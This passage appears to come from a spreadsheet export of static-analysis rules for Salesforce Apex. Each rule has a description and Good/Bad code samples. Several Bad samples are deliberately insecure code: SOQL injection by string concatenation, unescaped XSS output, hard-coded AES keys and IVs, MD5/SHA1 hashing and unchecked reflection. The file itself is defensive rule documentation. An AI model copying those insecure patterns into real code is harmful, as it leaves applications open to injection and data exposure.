    <t>Aura Controller class names should end with "Controller". Only classes linked to a page as a controller or extension are considered.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {  //Bad: not recommended.
  //....
}
public class FooController{  //Good: Purpose of the class is clear.
  //....
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyTryBlock</t>
  </si>
  <si>
    <t>Empty Try Block</t>
  </si>
  <si>
    <t>Avoid empty try blocks.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 public void bar() {
  try {						//Bad: Nothing is done here.
  } catch (Exception e) {
    e.printStackTrace();
  }
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:StringToString</t>
  </si>
  <si>
    <t>String To String</t>
  </si>
  <si>
    <t>Avoid calling toString() on objects already known to be string instances; this is unnecessary.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
private String baz() {
    String bar = 'howdy';
    return bar.toString();   //Bad: this is not recommended;
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryBooleanAssertion</t>
  </si>
  <si>
    <t>Unnecessary Boolean Assertion</t>
  </si>
  <si>
    <t>A Unit test assertion with a boolean literal is unnecessary since it always will evaluate to the same thing.
Consider using flow control (in case of assertTrue(false) or similar) or simply removing
statements like system.assert(true) and system.assert(!true).  If you just want a test to halt after finding
an error, use the system.assert(false, 'message') method and provide an indication message of why it did.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class SimpleTest {
	public static testmethod void testX() {
		System.assert(true);		 //Bad: serves no real purpose.
	}
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryReturn</t>
  </si>
  <si>
    <t>Unnecessary Return</t>
  </si>
  <si>
    <t>Avoid the use of unnecessary return statements.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar() {
    Integer x = 42;
    return;			//Bad: avoid this.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NcssMethodCount</t>
  </si>
  <si>
    <t>NCSS Method Count</t>
  </si>
  <si>
    <t>This rule uses the NCSS (Non-Commenting Source Statements) algorithm to determine the number of lines
of code for a given method. NCSS ignores comments, and counts actual statements. Using this algorithm,
lines of code that are split are counted as one.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar {
 public Integer methd() {		//this method only has 1 NCSS lines
     super.methd();
      return 1;
 }
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:BooleanGetMethodName</t>
  </si>
  <si>
    <t>Boolean Get Method Name</t>
  </si>
  <si>
    <t>Methods that return boolean results should be named as predicate statements to denote this.
I.e, 'isReady()', 'hasValues()', 'canCommit()', 'willFail()', etc.   Avoid the use of the 'get'
prefix for these methods.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public boolean getFoo(); 	//Bad: not recommended.
public boolean isFoo(); 	//Good: this is preferred.
public boolean getFoo(boolean bar); //This is OK, unless checkParameterizedMethods=true
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedPrivateMethod</t>
  </si>
  <si>
    <t>Unused Private Method</t>
  </si>
  <si>
    <t>Unused Private Method detects when a private method is declared but is unused.  
A potential 'false postive' can occur: private methods can still be used in a child class. However, it's best practise to declare these methods as protected to demonstrate that this class can be used in child classes.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	private void foo() {} //Bad: this method is unused.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AddEmptyString</t>
  </si>
  <si>
    <t>Add Empty String</t>
  </si>
  <si>
    <t>The conversion of literals to strings by concatenating them with empty strings is inefficient.
It is much better to use one of the type-specific toString() methods instead.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
String s = '' + 123; 				//Bad: this is inefficient. 
String t = Integer.toString(456); 	//Good: this is the preferred approach.
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyStaticInitializer</t>
  </si>
  <si>
    <t>Empty Static Initializer</t>
  </si>
  <si>
    <t>An empty static initializer serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	static {		//Bad: This should be removed.
	// empty
	}
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:GodClass</t>
  </si>
  <si>
    <t>God Class Rule</t>
  </si>
  <si>
    <t>The God Class rule detects the God Class design flaw using metrics. God classes do too many things,
are very big and overly complex. They should be split apart to be more object-oriented.&lt;br/&gt;
The rule uses the detection strategy described in "Object-Oriented Metrics in Practice".&lt;br/&gt;
&lt;br/&gt;
Every violation will include three metrics:&lt;br/&gt;
&lt;ul&gt;
  &lt;li&gt;WMC = Weighted Methods Count&lt;/li&gt;
  &lt;li&gt;ATFD = Access To Foreign Data&lt;/li&gt;
  &lt;li&gt;TCC = Tight Class Cohesion&lt;/li&gt;
&lt;/ul
&lt;br/&gt;
The violations are reported against the entire class. See also the references:&lt;br/&gt;
Michele Lanza and Radu Marinescu. Object-Oriented Metrics in Practice:&lt;br/&gt;
Using Software Metrics to Characterize, Evaluate, and Improve the Design&lt;br/&gt;
of Object-Oriented Systems. Springer, Berlin, 1 edition, October 2006. Page 80.&lt;br/&gt;
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
global class GodEngine {
  void GodEngine() {}
  public void doGodStuff {
    OutsideClassOne.doStuff();
    OutsideClassTwo.doStuff();
    if(doingStuff) {                         //Bad: This class accesses too many outside classes/data and is overly complex.
    	OutsideClassThree.doStuff();
    } else if (OutsideClass.isdoingOtherStuff()) {
      OutsideClassFour.doStuff();
    }
    OutsideClassFive.doStuff();
    OutsideClassSix.doStuff();
    OutsideClassSeven.doStuff();
    //...and more and more lines...
  }
  //..and more and more methods...
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ExceptionAsFlowControl</t>
  </si>
  <si>
    <t>Exception as Flow Control</t>
  </si>
  <si>
    <t>Using Exceptions as form of flow control is not recommended as they obscure true exceptions when debugging.
Either add the necessary validation or use an alternate control structure.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
    try {
      try {
      } catch (Exception e) {
        throw new WrapperException(e); //Bad: this is essentially a GOTO to the WrapperException catch block.	
       }
     } catch (WrapperException e) {
     // do some more stuff
    }
  }
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MisleadingVariableName</t>
  </si>
  <si>
    <t>Misleading Variable Name</t>
  </si>
  <si>
    <t>Detects when a non-field has a name starting with 'm_'.  This usually denotes a field and could be confusing.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    private Integer m_foo; 			//Good: this is OK.
    public void bar(String m_baz) { //Bad: this is not recommended...
      Integer m_boz = 42; 			//...and neither is this.
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TrackNoSonar</t>
  </si>
  <si>
    <t>Track Usage of //NOSONAR</t>
  </si>
  <si>
    <t>Overuse of the //NOSONAR rule suppression can mean issues in your code are not picked up.  This rule flags each usage to make sure it is needed.
  See &lt;a href="https://docs.codescan.io/hc/en-us/articles/360012109711-Ignoring-violations"&gt;docs.codescan.io&lt;/a&gt; for more information.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  // The following line will be ignored
  integer unusedValue = 1; //NOSONAR
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnitTestContainsTooManyAsserts</t>
  </si>
  <si>
    <t>Unit Test Method Contains Too Many Asserts</t>
  </si>
  <si>
    <t>Unit tests should not contain too many asserts.  Many asserts are indicative of a complex test, for which 
it is harder to verify correctness.  Consider breaking the test scenario into multiple, shorter test scenarios.  
Customize the maximum number of assertions used by this Rule to suit your needs.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyTestCase  {
	public testmethod void testMyCaseWithOneAssert() {	//Good: only one assert is used.
		boolean myVar = false;		
		system.assert(myVar);
	}
	@IsTest
	public void testMyCaseWithMoreAsserts() {	//Bad: too many asserts. Consider breaking the test into smaller parts.
		boolean myVar = false;		
		system.assert(myVar);
		system.assertEquals(false, myVar);
	}
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryFinalModifier</t>
  </si>
  <si>
    <t>Unnecessary Final Modifier</t>
  </si>
  <si>
    <t>When a class has the final modifier, all the methods are automatically final and do not need to be
tagged as such.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public final class Foo {
    private final void foo() {
    	// This final modifier is not necessary, since the class is final
    	// and thus, all methods are final
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ConfusingTernary</t>
  </si>
  <si>
    <t>Confusing Ternary</t>
  </si>
  <si>
    <t>Avoid negation within an 'if' expression with an 'else' clause. Most 'if (x != y)' cases 
without an "else" are often return cases, so consistent use of this rule makes the code 
easier to read.  Also, this resolves trivial ordering problems, such as "does the error 
case go first?" or "does the common case go first?".
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Consider re-writing this...
return (x != y) ? diff : same;
//or this...
if (x != y) diff(); else same(); 
//like this:
if (x == y) same(); else diff();
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidDuplicateLiterals</t>
  </si>
  <si>
    <t>Avoid Duplicate Literals</t>
  </si>
  <si>
    <t>Code containing duplicate String literals can usually be improved by declaring the String as a constant field.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
private void bar() {
     buz('Howdy');  //Bad: the String 'Howdy' could be declared as a constant field.
     buz('Howdy');
     buz('Howdy');
     buz('Howdy');
 }
 private void buz(String x) {}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidRethrowingException</t>
  </si>
  <si>
    <t>Avoid Re-Throwing Exception</t>
  </si>
  <si>
    <t>Catch blocks that merely rethrow a caught exception only add to code size and runtime complexity.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;  
public void bar() {
    try {
    // do something
    }  catch (SomeException se) {
       throw se;					//Bad: this is not recommended.
    }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidConstantsInterface</t>
  </si>
  <si>
    <t>Avoid Constants Interface</t>
  </si>
  <si>
    <t>An interface should be used only to characterize the external behaviour of an
implementing class: using an interface as a container of constants is a poor 
usage pattern and not recommended.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public interface ConstantsInterface {			//Bad: not recommended.
   public static final Integer CONSTANT1 = 0;
   public static final String CONSTANT2 = '1';
}
public final class ConstantsClass {					//Good: using a final class as a container for constants is preferred.
   public static final Integer CONSTANT3 = 0;
   public static final String CONSTANT4 = '1';
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidNotFinalPublicStaticFields</t>
  </si>
  <si>
    <t>Avoid Declaring Non-Final Public Static Fields</t>
  </si>
  <si>
    <t>There is no good reason to declare a field "public" and "static" without also declaring it "final". 
      Most of the time this is a kludge to share a state among several objects. But with this approach, 
      any object can do whatever it wants with the shared state, such as setting it toÂ null.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class PrimitiveType {
  public static integer sharedStateVariable;				//Bad: Not recommended.
  public static final integer aStaticFinalVariable = 123;	//Good: Preferred.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnescapedOutput</t>
  </si>
  <si>
    <t>Unescaped Error Message XSS</t>
  </si>
  <si>
    <t>Reports on calls to `addError` with disabled escaping. The message passed to `addError`
will be displayed directly to the user in the UI, making it prime ground for XSS
attacks if unescaped.&lt;br/&gt;
&lt;br/&gt;
See &lt;a href="http://cwe.mitre.org/data/definitions/79.html"&gt;MITRE, CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void triggerHandler(){
    	Trigger.new[0].addError(html, false); //Bad: html could contain an XSS vulnerability.
    	Trigger.new[0].addError(html, true); //Good: html is safely escaped.
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyStatementBlock</t>
  </si>
  <si>
    <t>Avoid Empty Statement Blocks</t>
  </si>
  <si>
    <t>Empty block statements serve no purpose and should be removed.
	&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   private Integer _bar;
   public void setBar(Integer bar) {
      { _bar = bar; } 		//This is ok.
      {} 					//Bad: This should be removed.
   }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryLocalBeforeReturn</t>
  </si>
  <si>
    <t>Unnecessary Local Before Return</t>
  </si>
  <si>
    <t>Avoid the creation of unnecessary local variables.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   public Integer foo() {
     Integer x = doSomething();
     return x;  				//Bad: Instead, just 'return doSomething();'.
   }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NonUnitTestContainsAsserts</t>
  </si>
  <si>
    <t>Non Test Method Contains Asserts</t>
  </si>
  <si>
    <t>Asserts should only be used in test methods.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyTestCase  {
	public testmethod void testMyCaseWithOneAssert() {  //Good: assert is being used within a test method.
		boolean myVar = false;		
		system.assert(myVar);
	}
	public void aNonTestMethodWithAsserts() {
		boolean myVar = false;		
		system.assertEquals(false, myVar);			//Bad: assertions should not be used outside test methods.
	}
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EqualsNull</t>
  </si>
  <si>
    <t>Equals Null</t>
  </si>
  <si>
    <t>Tests for null should not use the equals() method. The '==' operator should be used instead.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
String x = 'foo';
if (x.equals(null)) { //Bad: Not recommended.
   	doSomething();
	}
if (x == null) { 	//Good: This is preferred.
	}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:IfStmtsMustUseBraces</t>
  </si>
  <si>
    <t>If Statements Must Use Braces</t>
  </si>
  <si>
    <t>Avoid using 'if' statements without using braces to surround the code block. If the code 
formatting or indentation is lost then it becomes difficult to separate the code being
controlled from the rest.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
if (foo)	//Bad: Not recommended.
	x++;
	y++;	
if (foo) {	//Good: Preferred approach.
	x++;
	y++;
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidReassigningParameters</t>
  </si>
  <si>
    <t>Avoid Reassigning Parameters</t>
  </si>
  <si>
    <t>Reassigning values to incoming parameters is not recommended.  Use temporary local variables instead.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  private void foo(String bar) {
    bar = 'something else';			//Bad: Not recommended.
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidFieldNameMatchingMethodName</t>
  </si>
  <si>
    <t>Avoid Field Name Matching Method Name</t>
  </si>
  <si>
    <t>It can be confusing to have a field name with the same name as a method. While this is permitted, 
having information (field) and actions (method) is not clear naming. Developers versed in 
Smalltalk often prefer this approach as the methods denote accessor methods.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	Object bar;
					//Bad: naming a variable and a method bar is confusing and not recommended.
	void bar() {
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:OneDeclarationPerLine</t>
  </si>
  <si>
    <t>One Declaration Per Line</t>
  </si>
  <si>
    <t>Apex allows the use of several variable declarations of the same type on one line. However, it
can lead to quite messy code. This rule looks for several declarations on the same line.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {	
	String name; 			//Good: separate declarations are preferred.
	String lastname; 
	String name, lastname;	//Bad: combined declarations are not recommended.
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:HotspotDeserializeJson</t>
  </si>
  <si>
    <t>Deserializing JSON Is Security-Sensitive</t>
  </si>
  <si>
    <t>Deserializing an object from an untrusted source is security-sensitive. An attacker could modify the content of the data.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/502.html"&gt;MITRE, CWE-502&lt;/a&gt; - Deserialization of Untrusted Data &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A8 - Software and Data Integrity Failures &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Deserialization_of_untrusted_data"&gt;OWASP Deserialization of untrusted data&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#OBJECT_DESERIALIZATION"&gt;OBJECT_DESERIALIZATION &lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Car{ 
  private String make;
  private String year;
  public void createCar(String z, String x){ 
    Car c = (Car)JSON.deserializeStrict(
      '{"make":"'+ z + '","year":"' + x + '"}', Car.class);   //Bad: Unknown inputs are used to create the object.
  }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnescapedSource</t>
  </si>
  <si>
    <t>URL Parameters should be Escaped/Sanitized</t>
  </si>
  <si>
    <t>Makes sure that all values obtained from URL parameters are properly escaped / sanitized to avoid XSS attacks.&lt;br/&gt;
Input can be sanitized using Integer.valueOf, Date.valueOf, String.escapeHtml3, etc, or escaped using the 
esapi.encoder() functions from &lt;a href="https://github.com/forcedotcom/force-dot-com-esapi"&gt;https://github.com/forcedotcom/force-dot-com-esapi&lt;/a&gt;&lt;br/&gt;
&lt;br/&gt;
Tips to avoid this problem: Use an Id variable instead of String variable to store Id type parameters.
&lt;br/&gt;
See &lt;a href="http://cwe.mitre.org/data/definitions/79.html"&gt;MITRE, CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public Foo() {
    String unescapedstring = ApexPages.currentPage().getParameters().get('url_param');
    someOtherFunction(unescapedstring); 	 //Bad: this string is used elsewhere and may lead to an XSS vulnerability
    someOtherFunction(integer.valueof(unescapedstring));   //Good: the string is safely checked as an integer  
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:DMLWithoutSharingEnabled</t>
  </si>
  <si>
    <t>Sharing should be Configured on Classes with DML</t>
  </si>
  <si>
    <t>Executing DML should be done inside a class annotated with 'with sharing', 'inherited sharing' or 'without sharing'.&lt;br/&gt;
&lt;br/&gt;
By setting allowWithoutSharing=false, DML in classes flagged with 'without sharing' are still flagged.
This can be useful for manual reviews of classes working around security problems.
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;a href="https://cwe.mitre.org/data/definitions/282.html"&gt;CWE-282&lt;/a&gt; - Improper Ownership Management&lt;/li&gt;
	&lt;li&gt;See &lt;a href="https://cwe.mitre.org/data/definitions/284.html"&gt;CWE-284&lt;/a&gt; - Improper Access Control&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    public void foo () {     
      Account[] accounts = [ select name from account ]; // Bad: this returns all accounts not only the ones the current user has access to. 
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:HotspotCookies</t>
  </si>
  <si>
    <t>Using Cookies Is Security-Sensitive</t>
  </si>
  <si>
    <t>Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.&lt;br/&gt;
	&lt;br/&gt;
  &lt;h2&gt;See&lt;/h2&gt;
  &lt;ul&gt;
	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/312.html"&gt;MITRE, CWE-312&lt;/a&gt; - Cleartext Storage of Sensitive Information &lt;/li&gt;
	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/315.html"&gt;MITRE, CWE-315&lt;/a&gt; - Cleartext Storage of Sensitive Information in a Cookie &lt;/li&gt;
	  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/565.html"&gt;MITRE CWE-565&lt;/a&gt; - Reliance on Cookies without Validation and Integrity Checking &lt;/li&gt;
	  &lt;li&gt; OWASP Top 10 2021 Category A3 - Injection &lt;/li&gt;
	  &lt;li&gt; OWASP Top 10 2021 Category A2 - Cryptographic Failures &lt;/li&gt;
	  &lt;li&gt; &lt;a href="https://wiki.sei.cmu.edu/confluence/display/java/FIO52-J.+Do+not+store+unencrypted+sensitive+information+on+the+client+side"&gt;CERT,
	  FIO52-J.&lt;/a&gt; - Do not store unencrypted sensitive information on the client side &lt;/li&gt;
	  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#COOKIE_USAGE"&gt;COOKIE_USAGE&lt;/a&gt; &lt;/li&gt;
	&lt;/ul&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
  Cookie userCookie = new Cookie('CookieName', fieldValueToBeStoredAsCookie, null, 315569260, false);
  ApexPages.currentPage().setCookies(new Cookie[] {
      userCookie     //Bad: The cookie could be targeted by attackers to get access to sensitive information.
  });
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SOQLInjection</t>
  </si>
  <si>
    <t>Avoid Untrusted/Unescaped Variables in DML Query</t>
  </si>
  <si>
    <t>Detects the usage of untrusted / unescaped variables in DML queries.&lt;br/&gt;
&lt;br/&gt;
Without sufficient removal or quoting of SOQL syntax in user-controllable inputs, the generated SOQL query can cause those inputs to 
be interpreted as SOQL instead of ordinary user data. 
This can be used to alter query logic to bypass security checks.&lt;br/&gt;
&lt;br/&gt;
Input can be cleansed by using Id.valueOf, Date.valueOf, etc. Or escaped using String.escapeSingleQuotes().&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/89"&gt;MITRE, CWE-89&lt;/a&gt; - Improper Neutralization of Special Elements used in an SQL Command &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/20.html"&gt;MITRE, CWE-20&lt;/a&gt; - Improper Input Validation &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/943.html"&gt;MITRE, CWE-943&lt;/a&gt; - Improper Neutralization of Special Elements in Data Query Logic
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/PgIRAg"&gt;CERT, IDS00-J.&lt;/a&gt; - Prevent SQL injection &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A3 - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void test1() {
		//Bad: getFilter function may return unescaped data (potentially from user input).
		String field1 = getFilter(); 
		String field2 = 'SELECT Id FROM Account WHERE ';
		Database.query(field2 + field1);
		//Good: the function result is cleaned
		String field1 = '\'' + String.escapeSingleQuotes(getSomeId()) + '\'';
		String field2 = 'SELECT Id FROM Account WHERE isPublic = true and Id = ';
		Database.query(field2 + field1);
		//Good: better yet, use SOQL's built-in variable replacements
		String field1 = getSomeID();
		String field2 = 'SELECT Id FROM Account WHERE isPublic = true and Id = :field1';
		Database.query(field2);
	}		
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:HotspotTypeReflection</t>
  </si>
  <si>
    <t>Type Reflection Is Security Sensitive</t>
  </si>
  <si>
    <t>Dynamically executing code is security-sensitive.  If the code comes from an untrusted source, the untrusted source may be able to choose which code to run.&lt;br/&gt;
This vulnerability can lead to:
&lt;br/&gt;&lt;ul&gt;
&lt;li&gt;Unintended modification of the system state.&lt;/li&gt;
&lt;li&gt;Errors and/or termination of the application.&lt;/li&gt;
&lt;li&gt;Leaking of sensitive information in an error message.&lt;/li&gt;&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt; 
&lt;ul&gt;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A3 - Injection &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public MyController {
  private interface Implementation{
    void run();
  }
  private class AdminImplementation implements Implementation{
    public void run(){
      ... do something privileged
    }
  }
  private class StandardImplementation implements Implementation{
    public void run(){
	  ... normal implementation
    }
  }
  public void init(){
    Implementation i = Type.forName(implementationName);
      i.run(); //Bad: This unchecked implementation could lead to unexpectedly running the AdminImplementation code.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidInsecureMessageDigests</t>
  </si>
  <si>
    <t>Avoid Insecure Digest Algorithms</t>
  </si>
  <si>
    <t>MD5 and SHA-1 algorithms are no longer considered secure because it's too easy to create a hash collision between to message contents.&lt;br/&gt;
  	&lt;br/&gt;
  	This allows an attacker to craft content which produces the same hash.&lt;br/&gt;
  	&lt;br/&gt;
  	The SHA256 and SHA512 are considered secure alternatives&lt;br/&gt;
  	&lt;br/&gt;
	&lt;h2&gt;See&lt;/h2&gt;
	&lt;ul&gt;
	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/328"&gt;MITRE, CWE-328&lt;/a&gt; - Reversible One-Way Hash &lt;/li&gt;
	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/327"&gt;MITRE, CWE-327&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
	  &lt;li&gt; OWASP Top 10 2021 Category A5 - Security Misconfiguration &lt;/li&gt;
	  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
	  &lt;li&gt; &lt;a href="http://shattered.io/"&gt;SHAttered&lt;/a&gt; - The first concrete collision attack against SHA-1. &lt;/li&gt;
	&lt;/ul&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
Crypto.generateDigest('MD5', blob); //Bad: This is not secure.
Crypto.generateDigest('SHA1', blob); //Bad: This is not secure.
Crypto.generateDigest('SHA-256', blob); //Good: This is considered secure.
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:BadCrypto</t>
  </si>
  <si>
    <t>Apex Classes should use Random IV/Key</t>
  </si>
  <si>
    <t>The rule makes sure you are using randomly generated IVs and keys for `Crypto` calls.
Hard-wiring these values greatly compromises the security of encrypted data.&lt;br/&gt;
&lt;br/&gt;
Read &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_classes_restful_crypto.htm"&gt;here&lt;/a&gt; for more information.&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;OWASP Top 10 2017 Category A5 - Security Misconfiguration&lt;/li&gt;
	&lt;li&gt;&lt;a href="https://cwe.mitre.org/data/definitions/329.html"&gt;MITRE,CWE-329&lt;/a&gt; - Not Using a Random IV with CBC Mode&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void cryptoExamples(){
    Blob hardCodedKey = Blob.valueOf('0000000000000000');
    Blob hardCodedIV = Blob.valueOf('Hardcoded IV 123');
    Blob data = Blob.valueOf('Data to be encrypted');
    //Bad: use of hard coded key/iv.
    Blob encrypted = Crypto.encrypt('AES128', hardCodedKey, hardCodedIV, data);
    //Good: this is preferred.
    Blob key = Crypto.generateAesKey(128);
    Blob data = Blob.valueOf('Data to be encrypted');
    Blob encrypted = Crypto.encryptWithManagedIV('AES128', key, data);
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AssertEqualsOrder</t>
  </si>
  <si>
    <t>Assert Argument Order</t>
  </si>
  <si>
    <t>If the arguments provided to the assertEquals or assertNotEquals method are reversed, the test will have unexpected results.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@isTest
public class MyClassTest{
    static testMethod void BadTest(){
      //test code 
      System.assertEquals(es.size(), 0); //Bad: This is backwards.  Will show 'unit test failed: System.AssertException: Assertion Failed: Expected: 4, Actual: 0'
    }    
    static testMethod void GoodTest(){
      //test code 
      System.assertEquals(0, es.size()); //Good: This is the correct order.
    }  
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:InsufficientCommentDensity</t>
